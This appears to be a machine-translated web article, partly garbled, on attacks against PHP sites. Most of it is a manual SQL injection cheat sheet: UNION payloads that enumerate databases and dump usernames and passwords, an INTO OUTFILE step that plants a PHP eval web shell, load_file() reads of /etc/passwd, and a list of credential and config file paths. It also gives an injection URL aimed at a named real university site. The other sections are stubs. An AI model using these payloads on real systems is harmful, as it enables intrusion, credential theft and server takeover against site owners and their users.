A Summary of Several Common Attacks on PHP

This paper summarizes several common attack methods of PHP with examples. Share it for your reference, as follows:

1. SQL Injection (sql injection)

①. burst field length Order by num/*

Match field and 1=1 union select 1, 2, 3, 4, 5 … …. n/*

③ Exposure field position and 1=2 union select 1, 2, 3, 4, 5...... n/*

④ Using the built-in function to burst the database information

version() database() user()

There is no need to guess the available field burst database information (some websites are not applicable):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

Operating system information:

and 1=2 union all select @@global.version_compile_os from mysql.user /*

Database permissions:

and ord (mid (user (), 1, 1)) = 114/* Return to normal as root

Burst Library (mysql) > 5.0)

Above Mysql 5, there is a built-in library information_schema, which stores all the database and table structure information of mysql and 1=2 union select 1, 2, 3, SCHEMA_NAME, 5, 6, 7, 8, 9, 10 from information_schema. SCHEMATA limit 0, 1

Guess a watch

and 1=2 union select 1, 2, 3, TABLE_NAME, 5, 6, 7, 8, 9, 10 from information_schema. TABLES where TABLE_SCHEMA = Database (106ary) limit 0 (starting record, 0 is the first starting record), 1 (showing one record)-

Guess field

and 1=2 Union select 1, 2, 3, COLUMN_NAME, 5, 6, 7, 8, 9, 10 from information_schema. COLUMNS where TABLE_NAME= Table Name (106-ary) limit 0, 1

Critical cipher

and 1=2 Union select 1, 2, 3, username segment, 5, 6, 7, password segment, 8, 9 from table name limit 0, 1

Advanced usage (one available field displays two data contents): Union select 1, 2, 3concat (username field, 0x3c, password field), 5, 6, 7, 8, 9 from table name limit 0, 1

Write Horse Directly (Root Permission)

Conditions:

① Know the physical path of the site

2. Have sufficient permissions (can be tested with select... from mysql. user)

③, magic_quotes_gpc () = OFF

select ' < ?php eval($_POST[cmd])? > 'into outfile' Physical Path 'and 1=2 union all select 1 Sentence HEX Value into outfile' Path '

load_file () Common path:

1. replace (load_file (0 × 2F6574632F706173737764), 0 × 3c, 0 × 20)
2. replace (load_file (char (47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)), char (60), char (32)
The above two are to see the full display code in an PHP file. Sometimes you don't replace 1 characters, such as " < "Replace with" space "to return a web page. The code cannot be viewed.
3. load_file (char (47)) can list FreeBSD, Sunos system root directory
4./etc tpd/conf tpd. conf or/usr/local/apche/conf tpd. conf View the linux APACHE Virtual Host Configuration File
5. c:\ Program Files\ Apache Group\ Apache\ conf\ httpd. conf or C:\ apache\ conf\ httpd. conf View WINDOWS System apache Files
6. c:/Resin-3. 0.14/conf/resin. conf View the resin file configuration information for the website developed by jsp.
7. c:/Resin/conf/resin. conf/usr/local/resin/conf/resin. conf View JSP Virtual Host for linux System Configuration
8. d:\ APACHE\ Apache2\ conf\ httpd.conf
9. C:\ Program Files\ mysql\ my.ini
10,../themes/darkblue_orange/layout. inc. php phpmyadmin explosion path
11. c:\ windows\ system32\ inetsrv\ MetaBase. xml View the virtual host configuration file for IIS
12./usr/local/resin-3. 0.22/conf/resin. conf RESIN configuration file view for 3.0. 22
13./usr/local/resin-pro-3. 0.22/conf/resin. conf ibid.
14./usr/local/app/apache2/conf/extra tpd-vhosts. conf APASHE Virtual Host View
15,/etc/sysconfig/iptables This view of firewall strategy
16. usr/local/app/php5 b/php. ini PHP Equivalent Settings
17,/etc/my. cnf MYSQL configuration file
18,/etc/redhat-release Red Hat System Version
19. C:\ mysql\ data\ mysql\ user. MYD User password existing in MYSQL system
20,/etc/sysconfig/network-scripts/ifcfg-eth0 View IP.
21./usr/local/app/php5 b/php. ini//PHP related settings
22./usr/local/app/apache2/conf/extra tpd-vhosts. conf//Virtual Web Site Settings
23. C:\ Program Files\ RhinoSoft.com\ Serv-U\ ServUDaemon.ini
24. c:\ windows\ my. ini
25. c:\ boot. ini

Problems with manual injection:

When the post-injection page displays:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

For example: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID=13% 20and% 201=2% 20union% 20select% 201, load_file (0x433A5C626F6F742E696E69), 3, 4, user ()% 20

This is caused by different codes before and after,

Solution: Before the parameters, add unhex(hex(参数)) Just do it. The above URL can be changed to:

http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20

You can continue the injection. . .

2. XSS (Cross Site Scripting) (Cross Site Scripting Attack)

//www.ofstack.com/article/160334.htm

3. Source Code Revelation (source code exposure)

Can be controlled with php. ini or htaccess

<Files ~ "\.inc$">
   Order allow,deny
   Deny from all
</Files>

4. Remote File Inclusion (Remote File Inclusion Vulnerability)

<?php
$file = $_GET['file']; //  "  ../../etc/passwd\0 " 
if(file_exists('/home/wwwrun' . $file . '.php')){xxx}
?>

5. Session Hijacking (session hijacking)

6. Cross Site Request Forgery (Cross Station Request Forgery)

7. Directory Traversal (directory spanning)

For more readers interested in PHP related content, please check the topics on this site: "php Programming Security Tutorial", "php Security Filtering Skills Summary", "PHP Operation and Operator Usage Summary", "PHP Basic Syntax Introduction Tutorial", "php Object-Oriented Programming Introduction Tutorial", "php String (string) Usage Summary", "php+mysql Database Operation Introduction Tutorial" and "php Common Database Operation Skills Summary"

I hope this paper is helpful to everyone's PHP programming.